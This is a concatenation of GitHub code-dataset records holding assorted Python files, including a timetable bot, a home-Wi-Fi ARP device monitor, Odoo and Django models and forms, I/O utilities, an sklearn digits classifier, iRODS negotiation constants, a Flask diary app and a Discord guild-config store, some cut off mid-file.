pd.read_excel(f\"{CACHED_TABLE_PATH}/{CACHED_TABLE_NAME}\")\n\n def save_cache(table, CACHED_TABLE_PATH, CACHED_TABLE_NAME):\n table.to_excel(f\"{CACHED_TABLE_PATH}/{CACHED_TABLE_NAME}\", index=False)\n\n table = False\n download_failure = False\n if DOWNLOAD_LINK:\n try:\n table = download_table(DOWNLOAD_LINK)\n except Exception:\n download_failure = True\n\n if CACHED_TABLE_PATH and CACHED_TABLE_NAME or download_failure:\n table = get_cached_table(CACHED_TABLE_PATH, CACHED_TABLE_NAME)\n\n else:\n table = False\n\n if table.shape[0] and CACHED_TABLE_PATH and CACHED_TABLE_NAME:\n save_cache(table, CACHED_TABLE_PATH, CACHED_TABLE_NAME)\n\n return table\n\n\ndef split_table(table, target_group):\n global dow\n global sf_pairs\n\n def get_start_group_point(table, target_group):\n\n column1 = list(table[table.columns.values[0]].values)\n row_index = column1.index(\"Группа\")\n column_index = list(table.iloc[row_index, :].values).index(target_group)\n\n return column_index, row_index\n\n def clean_df_table(table):\n return table.dropna()\n\n column_index, row_index = get_start_group_point(table, target_group)\n\n # 12*6 - pairs per day * working days\n # +2 - useless rows\n # +4 - pair_name, type_of_pair, teacher, classroom\n target_table = table.iloc[\n row_index + 2 : row_index + 2 + 12 * 6, column_index : column_index + 4\n ].reset_index(drop=True)\n\n new_pair_types = target_table[target_table.columns.values[1]].apply(\n lambda x: x if x != \"пр\" else \"сем\"\n )\n\n target_table[target_table.columns.values[1]] = new_pair_types\n\n target_table_odd = pd.concat(\n (\n pd.Series(np.array(list(map(lambda x: [x] * 6, dow))).reshape(1, -1)[0]),\n pd.Series(sf_pairs * 6),\n target_table.iloc[::2].reset_index(drop=True),\n ),\n axis=1,\n )\n\n target_table_even = pd.concat(\n (\n pd.Series(np.array(list(map(lambda x: [x] * 6, dow))).reshape(1, -1)[0]),\n pd.Series(sf_pairs * 6),\n target_table.iloc[1::2].reset_index(drop=True),\n ),\n axis=1,\n )\n\n return (\n clean_df_table(target_table_odd),\n clean_df_table(target_table_even),\n )\n\n\ndef daily_table_text(table, target_group):\n global sf_pairs\n global dow\n global start_date\n global today_dow\n\n def make_dow_table_text(table):\n today_dow = dow[datetime.today().weekday()]\n\n today_table = table[table[table.columns.values[0]] == today_dow].reset_index(\n drop=True\n )\n\n s = \"\"\n times_arr = []\n for row in today_table[today_table.columns.values[1:]].to_records():\n times_arr.append(row[1])\n s += f\"{sf_pairs.index(row[1]) + 1} ({row[1]})\\n\"\n s += f\" {(row[2])}\\n\"\n s += f\" {row[3]} {row[5]}\\n\"\n s += f\" {row[4]}\\n\\n\"\n s = s[:-1]\n\n return s, times_arr\n\n current_week = datetime.now().isocalendar()[1]\n start_week = datetime.strptime(start_date, \"%d.%m.%Y\").isocalendar()[1]\n\n if current_week > 16:\n raise ValueError\n\n odd_week = (current_week - start_week) % 2 == 1\n today_list = list(datetime.now().date().timetuple())[:3][::-1]\n times_arr = []\n\n s = target_group + \"\\n\"\n s += f'Сегодня {\".\".join(str(el) for el in today_list)} '\n s += f\"({today_dow})\\n\"\n s += \"Нечетная\" if odd_week else \"Четная\"\n s += f\" неделя ({current_week - start_week})\\n\\n\"\n\n if odd_week:\n s_, times_arr = make_dow_table_text(split_table(table, target_group)[0])\n\n s += s_\n\n else:\n s_, times_arr = make_dow_table_text(split_table(table, target_group)[1])\n\n s += s_\n\n pair_start = times_arr[0].split(\"-\")[0]\n pair_stop = times_arr[-1].split(\"-\")[-1]\n\n s += f\"\\nС {pair_start} до {pair_stop}\"\n\n return s\n\n\ndef weekly_table_text(table, target_group):\n global sf_pairs\n global dow\n global start_date\n global today_dow\n\n current_week = datetime.now().isocalendar()[1]\n start_week = datetime.strptime(start_date, \"%d.%m.%Y\").isocalendar()[1]\n\n odd_week = (current_week - start_week) % 2 == 1\n today_list = list(datetime.now().date().timetuple())[:3][::-1]\n\n # if current_week > 16:\n\n # s = \"\"\n # s += \"\\nА учебы больше нет)))\\n\\n\\n\"\n # s += \" * Я из прошлого надеюсь, \\n что у тебя все круто\\n\\n\"\n\n # return s\n\n s = target_group + \"\\n\"\n s += f'Сегодня {\".\".join(str(el) for el in today_list)} '\n s += f\"({today_dow})\\n\"\n s += \"Нечетная\" if odd_week else \"Четная\"\n s += f\" неделя ({current_week - start_week})\\n\\n\"\n\n tab = split_table(table, target_group)[0 if odd_week else 1]\n\n for i, day_of_week in enumerate(dow):\n dow_table = tab[tab[tab.columns.values[0]] == day_of_week]\n\n if dow_table.shape[0] == 0:\n continue\n\n pair_time = dow_table[tab.columns.values[1]].values\n pair_number = list(map(lambda x: sf_pairs.index(x) + 1, pair_time))\n pair_name = dow_table[tab.columns.values[2]].values\n\n s += day_of_week + \"\\n\"\n\n for i, cur_pair_number in enumerate(pair_number):\n s += f\" {cur_pair_number} : {pair_name[i]}\\n\"\n\n s += \"\\n\"\n\n s += \"Удивительное количество пар !!!\\n\"\n s += f\"Целых {tab.shape[0]} всего за неделю\"\n\n return s\n\n\ndef genegate_timetable_text(\n target_group,\n CACHED_TABLE_PATH: str = None,\n CACHED_TABLE_NAME: str = None,\n DOWNLOAD_LINK: str = None,\n):\n\n table = get_table(\n CACHED_TABLE_PATH=CACHED_TABLE_PATH,\n CACHED_TABLE_NAME=CACHED_TABLE_NAME,\n DOWNLOAD_LINK=DOWNLOAD_LINK,\n )\n\n global today_dow\n\n if today_dow == \"Вс\" or True:\n return weekly_table_text(table, target_group)\n\n else:\n return daily_table_text(table, target_group)\n\n\ndef make_timetable_image_buff(SCRIPT_PATH: str, target_group, CURRENT_CONFIG):\n\n REL_FONT_PATH = CURRENT_CONFIG[\"FONT_PATH\"]\n REL_IMAGE_PATH = CURRENT_CONFIG[\"REL_IMAGE_PATH\"]\n CACHED_TABLE_PATH = CURRENT_CONFIG[\"CACHED_TABLE_PATH\"]\n CACHED_TABLE_NAME = CURRENT_CONFIG[\"CACHED_TABLE_NAME\"]\n\n DOWNLOAD_LINK = CURRENT_CONFIG[\"DOWNLOAD_LINK\"][\"FULL_LINK_PATH\"]\n\n def pick_background_image_path(SCRIPT_PATH, REL_IMAGE_PATH):\n\n random_image_filename = random.choice(\n os.listdir(f\"{SCRIPT_PATH}/{REL_IMAGE_PATH}\")\n )\n\n background_image_path = f\"{SCRIPT_PATH}/img/images/{random_image_filename}\"\n\n return background_image_path\n\n table_text = genegate_timetable_text(\n CACHED_TABLE_PATH=CACHED_TABLE_PATH,\n CACHED_TABLE_NAME=CACHED_TABLE_NAME,\n target_group=target_group,\n DOWNLOAD_LINK=DOWNLOAD_LINK,\n )\n\n text_image = TextImage(\n timetable_text=table_text,\n rel_font_path=REL_FONT_PATH,\n SCRIPT_PATH=SCRIPT_PATH,\n background_image_path=pick_background_image_path(SCRIPT_PATH, REL_IMAGE_PATH),\n )\n\n img = text_image.make_timetable_image()\n\n buff = BytesIO()\n img.save(buff, format=\"PNG\")\n\n return buff.getvalue()\n","repo_name":"alex7186/timetable_bot","sub_path":"back/table_manager.py","file_name":"table_manager.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24833136159","text":"import scapy.all as scapy\nimport time\nimport subprocess\nimport ipaddress\n\nNETWORK = \"192.168.1.0/24\"\nINTERVAL = 30 # seconds\nmapping = {\n '11:22:22:33:44:55': 'John Mobile',\n '66:77:88:99:11:22': 'Eric PC',\n '33:44:55:66:77:88': 'Bob Mobile'\n}\n\n\ndef scan(ip):\n # Use a set object to store the MAC addresses of the devices\n macs = set()\n\n # Create an ARP request packet\n arp_request = scapy.ARP(pdst=ip)\n\n # Create an Ethernet packet with a broadcast destination MAC address\n broadcast = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')\n\n # Combine the Ethernet and ARP request packets\n arp_request_broadcast = broadcast/arp_request\n\n # Send the packet and get the response\n answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]\n\n # Iterate over the hosts in the response\n for host in answered_list:\n # Check if the host's IP address is not the default gateway\n if host[1].psrc != \"192.168.1.1\":\n # Add the host's MAC address to the set of MAC addresses\n macs.add(host[1].src)\n\n # Return the set of MAC addresses\n return macs\n\n\ndef connection_change(hosts, action):\n # Validate the action\n if action not in (\"connected\", \"disconnected\"):\n raise ValueError(f\"Invalid action: {action}\")\n\n # Iterate over the hosts in the set\n for host in hosts:\n # Check if the host's MAC address is in the mapping\n if host in mapping:\n device = mapping[host] # Get the device name\n else:\n device = 'unknown device' # Use a default name\n\n # Create the command to run\n if action == 'connected':\n cmd = [\"echo\", f\"{device} connected\", \"|\", \"cscript\", \"C:\\\\Progra~1\\\\Jampal\\\\ptts.vbs\"]\n else:\n cmd = [\"echo\", f\"{device} disconnected\", \"|\", \"cscript\", \"C:\\\\Progra~1\\\\Jampal\\\\ptts.vbs\"]\n\n # Run the command\n subprocess.run(cmd, stdout=None, stderr=None)\n\n\ndef main():\n # Parse and validate the network IP address and subnet mask\n network = ipaddress.ip_network(NETWORK, strict=False)\n\n # Scan the network for devices\n old_macs = scan(network)\n\n # Announce that the devices are connected\n connection_change(old_macs, \"connected\")\n\n # Loop indefinitely\n while True:\n # Sleep for the specified interval\n time.sleep(INTERVAL)\n\n # Scan the network for devices\n macs = scan(network)\n\n # Calculate the set of new devices\n new = macs\n","repo_name":"Ahmed-Z/who_is_on_my_wifi","sub_path":"who_is_on_my_wifi.py","file_name":"who_is_on_my_wifi.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"30510488679","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError, UserError\n\n\nclass OrganizationCategory(models.Model):\n _name = 'ss_erp.organization.category'\n _description = 'Organization category'\n\n name = fields.Char(string='Category name')\n company_id = fields.Many2one(\n 'res.company', string='Company', required=True,\n readonly=True, default=lambda self: self.env.company)\n sequence = fields.Integer(\"Sequence\")\n active = fields.Boolean(\n default=True, help=\"If the active field is set to False, it will allow you to hide the payment terms without removing it.\")\n hierarchy_number = fields.Integer(\"Hierarchy\")\n organization_count = fields.Integer(\n string=\"Organization Count\", compute=\"_compute_organization_count\",\n compute_sudo=True\n )\n organization_ids = fields.One2many(\n \"ss_erp.organization\", \"organization_category_id\", string=\"Organizations\")\n\n _sql_constraints = [\n (\"name_uniq\", \"UNIQUE(name)\", \"Organization Category Name Should Be Unique!\")\n ]\n\n @api.depends(\"organization_ids\")\n def _compute_organization_count(self):\n for record in self:\n record.organization_count = len(record.organization_ids)\n\n def action_view_organizations(self):\n organization_ids = self.organization_ids\n action = self.env.ref('ss_erp_master.action_organizations')\n result = action.read()[0]\n result[\"context\"] = {}\n organization_count = len(organization_ids)\n if organization_count != 1:\n result[\"domain\"] = \"[('organization_category_id', 'in', \" + \\\n str(self.ids) + \")]\"\n return result\n res = self.env.ref('ss_erp_master.organization_view_form', False)\n result[\"views\"] = [(res and res.id or False, \"form\")]\n result[\"res_id\"] = organization_ids.id\n return result\n\n def unlink(self):\n for record in self:\n if self.env['ss_erp.organization'].search([('organization_category_id', '=', record.id)]):\n raise UserError(\n _('You can not delete organization category as other records still reference it. However, you can archive it.'))\n return super(OrganizationCategory, self).unlink()\n","repo_name":"tu95ctv/sgvn","sub_path":"ss_erp_master/models/organization_category.py","file_name":"organization_category.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21601587969","text":"import imp\nfrom typing import Text\nfrom .models import Articl, Comments\nfrom django.forms import ModelForm, TextInput, Textarea, DateTimeInput\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import get_user_model\n\n\nclass ArticlForm(ModelForm):\n class Meta:\n model = Articl\n fields = ['title' , 'info' , 'full_text' , 'data']\n\n widgets = {\n \"title\" : TextInput(attrs={\n 'class': 'text-add' ,\n 'placeholder' : 'Название вакансии' \n }),\n \"info\" : TextInput(attrs={\n 'class': 'text-add' ,\n 'placeholder' : 'Зарплата' \n }),\n \"full_text\" : Textarea(attrs={\n 'class': 'text-add' ,\n 'placeholder' : 'Полная информация по вакансии' \n }),\n \"data\" : DateTimeInput(attrs={\n 'class': 'text-add',\n 'placeholder' : 'Дата публикации',\n 'type' : 'date'\n })\n }\n\nUser = get_user_model()\n\nclass UserCreationForm(UserCreationForm):\n\n class Meta(UserCreationForm.Meta):\n model = User\n\nclass CommentForm(ModelForm):\n class Meta:\n model = Comments\n fields = ['text',]\n\n widgets = {\n \"text\" : Textarea(attrs={\n 'class': 'form__text' ,\n 'placeholder' : 'Впишите отзыв'\n })\n }\n","repo_name":"WindFallten/Kursach","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1174021182","text":"import json\nimport os\nimport pickle\nimport re\nfrom pathlib import Path\nfrom typing import Any, DefaultDict, Iterable, List, Optional, OrderedDict\n\nimport numpy as np\nimport torch\n\nfrom rex.utils.deprecation import deprecation_warning\nfrom rex.utils.logging import logger\n\n\ndef tensor_friendly_json_encoding(obj: Any):\n if isinstance(obj, DefaultDict) or isinstance(obj, OrderedDict):\n obj = dict(obj)\n elif isinstance(obj, set):\n obj = list(obj)\n elif isinstance(obj, np.ndarray):\n obj = obj.tolist()\n elif isinstance(obj, np.generic):\n obj = obj.item()\n elif isinstance(obj, torch.Tensor):\n if len(obj.shape) == 0:\n # scalar\n obj = obj.item()\n else:\n obj = obj.tolist()\n return obj\n\n\ndef dump_json(obj, filepath, **kwargs):\n with open(filepath, \"wt\", encoding=\"utf-8\") as fout:\n json.dump(\n obj,\n fout,\n ensure_ascii=False,\n default=tensor_friendly_json_encoding,\n **kwargs,\n )\n\n\ndef load_json(filepath, **kwargs):\n data = list()\n with open(filepath, \"rt\", encoding=\"utf-8\") as fin:\n data = json.load(fin, **kwargs)\n return data\n\n\ndef dump_line_json(obj, filepath, **kwargs):\n deprecation_warning(\"dump_line_json\", \"dump_jsonlines\")\n return dump_jsonlines(obj, filepath, **kwargs)\n\n\ndef dump_jsonlines(obj, filepath, **kwargs):\n with open(filepath, \"wt\", encoding=\"utf-8\") as fout:\n for d in obj:\n line_d = json.dumps(\n d, ensure_ascii=False, default=tensor_friendly_json_encoding, **kwargs\n )\n fout.write(\"{}\\n\".format(line_d))\n\n\ndef load_line_json(filepath, **kwargs):\n deprecation_warning(\"load_line_json\", \"load_jsonlines\")\n return load_jsonlines(filepath, **kwargs)\n\n\ndef load_jsonlines(filepath, **kwargs):\n data = list()\n with open(filepath, \"rt\", encoding=\"utf-8\") as fin:\n for line in fin:\n line_data = json.loads(line.strip())\n data.append(line_data)\n return data\n\n\ndef dump_pickle(obj, filepath, **kwargs):\n with open(filepath, \"wb\") as fout:\n pickle.dump(obj, fout, **kwargs)\n\n\ndef load_pickle(filepath, **kwargs):\n data = None\n with open(filepath, \"rb\") as fin:\n data = pickle.load(fin, **kwargs)\n return data\n\n\ndef dump_csv(obj: Iterable[Any], filepath: str, delimiter: Optional[str] = \"\\t\"):\n with open(filepath, \"wt\", encoding=\"utf-8\") as fout:\n for d in obj:\n line_d = delimiter.join(d)\n fout.write(\"{}\\n\".format(line_d))\n\n\ndef load_csv(\n filepath: str,\n title_row: bool,\n title_keys: Optional[List[str]] = None,\n sep: Optional[str] = \"\\t\",\n) -> List:\n \"\"\"load csv file\n\n Args:\n filepath: filepath to load\n title_row: has title in the first row or not?\n If true, it'll return a list of dict where keys are from\n the title, otherwise a list of str list.\n title_keys: if not `title_row`, you can set the title keys yourself.\n sep: separation char\n \"\"\"\n data = list()\n title_keys = title_keys if title_keys else []\n with open(filepath, \"rt\", encoding=\"utf-8\") as fin:\n for idx, line in enumerate(fin):\n line_data = line.strip().split(sep)\n if title_row and idx == 0:\n title_keys = line_data\n continue\n if title_keys:\n if len(title_keys) != len(line_data):\n raise RuntimeError(\n f\"len of title keys: {title_keys}\"\n f\" does not match the line data in line {idx + 1}\"\n f\" in file: {filepath}\"\n )\n ins = {}\n for col, key in zip(line_data, title_keys):\n ins[key] = col\n else:\n ins = line_data\n data.append(ins)\n return data\n\n\ndef load_embedding_file(filepath, encoding=\"utf-8\", open_func=open, verbose=False):\n tokens = []\n token2vec = {}\n num_tokens = -1\n dim_emb = 0\n with open_func(filepath, \"rt\", encoding=encoding) as fin:\n for line_no, line in enumerate(fin):\n line = line.split()\n if line_no == 0:\n if len(line) == 2 and all(x.isdigit() for x in line):\n num_tokens = int(line[0])\n dim_emb = int(line[1])\n else:\n dim_emb = len(line) - 1\n tokens.append(line[0])\n token2vec[line[0]] = list(map(float, line[1:]))\n continue\n # dimension checking\n if len(line) - 1 != dim_emb:\n continue\n tokens.append(line[0])\n token2vec[line[0]] = list(map(float, line[1:]))\n\n if num_tokens > 0 and num_tokens != len(tokens):\n logger.warning(\n f\"emb file info num of tokens: {num_tokens}, while {len(tokens)} tokens are found\"\n )\n\n if verbose:\n logger.info(f\"Loading #Tokens: {len(tokens)}, Emb dim: {dim_emb}\")\n\n return tokens, token2vec\n\n\ndef load_line_iterator(filepath):\n with open(filepath, \"rt\", encoding=\"utf-8\") as fin:\n for line in fin:\n yield line\n\n\ndef load_line_json_iterator(filepath, **kwargs):\n deprecation_warning(\"load_line_json_iterator\", \"load_jsonlines_iterator\")\n return load_jsonlines_iterator(filepath, **kwargs)\n\n\ndef load_jsonlines_iterator(filepath):\n for line in load_line_iterator(filepath):\n yield json.loads(line)\n\n\ndef dump_iterable(obj: Iterable, filepath: str):\n with open(filepath, \"wt\", encoding=\"utf-8\") as fout:\n for line in obj:\n fout.write(f\"{line}\\n\")\n\n\ndef split_filepath(filepath: str) -> tuple:\n \"\"\"Split filepath into folder path, filename, prefix and suffix\"\"\"\n path = Path(filepath)\n folder = str(path.absolute().parent)\n filename = path.name\n suffix = path.suffix\n prefix = filename.removesuffix(suffix)\n return folder, filename, prefix, suffix\n\n\ndef find_files(regex: str, folder: str, recursive: bool = True) -> List[str]:\n \"\"\"Find files with regex in a folder\"\"\"\n regex = re.compile(regex, flags=re.DOTALL)\n files = []\n for root, _, filenames in os.walk(folder):\n for filename in filenames:\n if regex.match(filename):\n files.append(os.path.join(root, filename))\n if not recursive:\n break\n return files\n","repo_name":"Spico197/REx","sub_path":"rex/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"18"} +{"seq_id":"16829920791","text":"import winsound, time\nprint(\"Okay, atempting to print the terminal bell.\")\ninput()\nprint(\"\\a\")\nprint(\"Now doing a winsound beep.\")\ninput()\nwinsound.Beep(1000,1000)\nprint(\"Okay, now doing a thing where we go through a loop and beep.\")\nfor x in range(2000):\n\tif x<37: continue\n\twinsound.Beep(x,200)\n\tx=x+49\n","repo_name":"braillescreen/PythonBeep","sub_path":"BeepPython.py","file_name":"BeepPython.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26155489140","text":"import matplotlib.pyplot as plt\nfrom sklearn.datasets import load_digits\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sn\nimport numpy as np\n\n# data preprocessing\ndigits = load_digits()\n\nX_train , X_test , y_train , y_test = train_test_split(digits.data , digits.target , test_size=0.2)\nprint(X_train.shape , X_test.shape)\n\n# model training\n\nmodel = LogisticRegression(max_iter=10000)\nmodel.fit(X_train,y_train)\n\n# results\n\nprint(model.score(X_test,y_test))\n\n# generate random numbers and test\n\nnp.random.seed(np.random.randint(0,100))\nrandom_numbers = np.random.randint(0, 1797, size=5)\n\npredictions_array , target_array = [] , []\nfor number in random_numbers:\n target_array.append(digits.target[number])\n predictions_array.append(model.predict([digits.data[number]]))\n\nprint('Actual : ' , target_array , 'Predictions : ' , np.array(predictions_array).flatten())\n\n# see the faliure\n\ny_predicted = model.predict(X_test)\ncm = confusion_matrix(y_test,y_predicted)\nplt.figure(figsize=(10,7))\nsn.heatmap(cm,annot=True)\nplt.xlabel('Predicted')\nplt.xlabel('Truth')\n\nplt.show()","repo_name":"Alexis-Papazoglou/ML_Roadmap","sub_path":"v8 - Multiclass Logistic Regression/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19239520570","text":"# https://packaging.python.org/guides/distributing-packages-using-setuptools/\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n# with open(\"requirements.txt\", \"r\") as fh:\n# requirements = [line.strip() for line in fh]\n\nwith open(\"VERSION\", \"r\") as fh:\n version = fh.readline()\n\nsetuptools.setup(\n name=\"mdtocf\",\n version=version,\n author=\"Olaf Reitmaier Veracierta\",\n author_email=\"olafrv@gmail.com\",\n description=\"Markdown files/directory publishing to Atlassian Confluence\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/olafrv/mdtocf\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n # install_requires=requirements,\n)\n","repo_name":"olafrv/mdtocf","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"23661638467","text":"import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nsns.set(style=\"darkgrid\",\n\trc = {'figure.figsize':(11.7,8.27)})\n\npublishers = pd.read_csv(\"publishers.csv\")\n\ng = sns.boxplot(x = \"genre\", y = \"sale price\", data = publishers,\n\t\t\t\tpalette = \"Set1\")\nplt.title(\"Boxplot of Amazon E-books Sale Price by Genre\")\n\ng.axes.set_title(\"Boxplot of Amazon E-books Sale Price by Genre\\n\",fontsize=25)\ng.set_xlabel(\"\\nGenre\",fontsize=20)\ng.set_ylabel(\"Sale Price\\n\",fontsize=20)\n\n\ng.figure.savefig(\"boxplot.png\")\nplt.show()","repo_name":"dongchris/data-visualization","sub_path":"seaborn_amazon_ebooks/code/boxplot_sales_price_genre.py","file_name":"boxplot_sales_price_genre.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74113766439","text":"\n# https://github.com/irods/irods/blob/4.2.1/lib/core/include/irods_client_server_negotiation.hpp\n# https://github.com/irods/irods/blob/4.2.1/lib/core/src/irods_client_negotiation.cpp\n\n# Token sent to the server to request negotiation\nREQUEST_NEGOTIATION = \"request_server_negotiation\"\n\n# Negotiation request values\nREQUIRE_SSL = \"CS_NEG_REQUIRE\"\nREQUIRE_TCP = \"CS_NEG_REFUSE\"\n\n# Negotiation result (response) values\nFAILURE = \"CS_NEG_FAILURE\"\nUSE_SSL = \"CS_NEG_USE_SSL\"\nUSE_TCP = \"CS_NEG_USE_TCP\"\n\n# Keywords\nCS_NEG_SID_KW = \"cs_neg_sid_kw\"\nCS_NEG_RESULT_KW = \"cs_neg_result_kw\"\n\n\ndef perform_negotiation(client_policy, server_policy):\n if REQUIRE_SSL in (client_policy, server_policy):\n if REQUIRE_TCP in (client_policy, server_policy):\n return FAILURE, 0\n return USE_SSL, 1\n return USE_TCP, 1\n\n\ndef validate_policy(policy):\n if policy not in (REQUIRE_SSL, REQUIRE_TCP):\n raise ValueError('Invalid client-server negotiation policy: {}'.format(policy))\n","repo_name":"irods/python-irodsclient","sub_path":"irods/client_server_negotiation.py","file_name":"client_server_negotiation.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"18"} +{"seq_id":"15431871393","text":"from flask import Flask,render_template,request,session, redirect, make_response,url_for\nimport psycopg2\nimport psycopg2.extras\nfrom werkzeug.utils import secure_filename\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\n\napp=Flask(__name__)\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'ufawifyagwer1742yncs2'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://localhost/litalico'\ndb = SQLAlchemy(app)\nmigrate = Migrate(app,db)\n\n#モデルの定義エリア\nclass User_table(db.Model):\n id = db.Column(db.Integer,primary_key=True)\n username = db.Column(db.String(20),unique=True)\n\nclass Message_table(db.Model):\n diary_id = db.Column(db.Integer,primary_key = True)\n sender_id = db.Column(db.Integer)\n receiver_id = db.Column(db.Integer)\n contents = db.Column(db.String(400))\n attention = db.Column(db.Integer)\n\n#ルーティングエリア\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/admin/users\")\ndef show_users():\n all_user = User_table.query.filter(User_table.id >= 2)\n return render_template(\"all_user.html\",all_user = all_user)\n\n@app.route(\"/admin/articles/\")\ndef supporter_posting(id):\n if Message_table.query.filter(Message_table.sender_id==2):\n from_message = sorted(Message_table.query.filter(Message_table.sender_id==2),key = lambda message:message.diary_id)\n username = \"test\"\n return render_template(\"re_article.html\",username=username,from_message=from_message)\n else:\n return render_template(\"none.html\")\n\n@app.route(\"/posted_page\",methods=[\"POST\"])\ndef post_page():\n id = request.form[\"id\"]\n contents = request.form[\"contents\"]\n sender_id = 2\n receiver_id = 1\n new_article = Message_table(sender_id=sender_id, receiver_id = receiver_id,contents=contents,attention=0)\n db.session.add(new_article)\n db.session.commit()\n return redirect(\"/articles/new#form\")\n\n@app.route(\"/articles/new\")\ndef supported_posting():\n id = 2\n past_message = Message_table.query.filter(Message_table.sender_id == 2)\n return render_template(\"article.html\",id=id,past_message=past_message)\n\n@app.route(\"/attention\",methods=[\"POST\"])\ndef attention():\n diary_id = request.form[\"diary_id\"]\n update_attention = Message_table.query.filter(Message_table.diary_id == diary_id).first()\n update_attention.attention = 1\n db.session.commit()\n return redirect(\"/admin/articles/2#diary-\" + diary_id)\n\n#DBのコマンド\n@app.cli.command(\"initdb\")\ndef initdb_command():\n db.create_all()\n","repo_name":"litalico-si-2018/e_team","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74983777639","text":"from ast import literal_eval\nimport json\nfrom datetime import datetime, timedelta\nimport discord\n\nclass GuildConfigDB:\n def __init__(self, db):\n self.db = db\n\n \n async def check_guild(self, guild_id: int):\n conn = await self.db.get_connection()\n x = await conn.fetch(\"SELECT * FROM guild_config WHERE guild_id=$1\", guild_id)\n await conn.close()\n if len(x) < 1:\n return \"No records of this guild on database\"\n return x[0]\n\n async def get_conf(self, guild_id: int, attr):\n conn = await self.db.get_connection()\n x = await conn.fetchrow(\"SELECT config FROM guild_config WHERE guild_id = $1\", guild_id)\n await conn.close()\n config = literal_eval(x[0])\n try:\n conf_attr = config[attr]\n except KeyError:\n return None\n return conf_attr\n \n async def get_module(self, guild_id: int):\n conn = await self.db.get_connection()\n x = await conn.fetchrow(\"SELECT modules FROM guild_config WHERE guild_id = $1\", guild_id)\n await conn.close()\n modules = literal_eval(x[0])\n return modules\n\n async def add_conf(self, guild_id: int, attr: str, attr_id):\n conn = await self.db.get_connection()\n config = await self.get_conf(guild_id)\n configuration = literal_eval(config[0])\n configuration[attr] = attr_id\n await conn.execute(\"UPDATE guild_config SET config = $1 WHERE guild_id = $2\", f\"{configuration}\", guild_id)\n await conn.close()\n\n async def add_guild(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n guild_text = {}\n guild_voice = {}\n guild_roles = {}\n for tchan in guild.text_channels:\n guild_text[tchan.name] = tchan.id\n for vchan in guild.voice_channels:\n guild_voice[vchan.name] = vchan.id\n for role in guild.roles:\n guild_roles[role.name] = [role.id, str(role.color)]\n guildtext = json.dumps(guild_text)\n guildvoice = json.dumps(guild_voice)\n del guild_roles[\"@everyone\"]\n guildroles = json.dumps(guild_roles)\n guildconfig = json.dumps({'prefix': 'e!'})\n guildmodules = json.dumps({'ban': True})\n await conn.execute(\"INSERT INTO guild_config(guild_id, guild_name, guild_members, guild_text, guild_voice, guild_roles, \"\n \"config, modules) VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\", guild.id, guild.name, len(guild.members),\n guildtext, guildvoice, guildroles, guildconfig, guildmodules)\n await conn.close()\n\n async def remove_guild(self, guild_id: int):\n conn = await self.db.get_connection()\n await conn.execute(\"DELETE FROM guild_config WHERE guild_id=$1\", guild_id)\n await conn.close()\n \n async def add_bot_removed(self, guild_id):\n conn = await self.db.get_connection()\n expiryDate = datetime.utcnow() + timedelta(days=30)\n await conn.execute(\"UPDATE guild_config SET bot_removed=$1 WHERE guild_id=$2\", str(expiryDate), guild_id)\n \n async def remove_bot_removed(self, guild_id):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET bot_removed=$1 WHERE guild_id=$2\", None, guild_id)\n \n async def get_outdated_configs(self):\n conn = await self.db.get_connection()\n try:\n x = await conn.fetch(\"SELECT * FROM guild_config WHERE bot_removed <= $1\", str(datetime.datetime.utcnow()))\n except:\n return None\n await conn.close()\n return x\n \n async def add_every_guild(self, guilds: list):\n for guild in guilds:\n await self.add_guild(guild)\n print(\"Added all guilds to db\")\n \n async def update_guild_name(self, guild: discord.Guild):\n conn = await 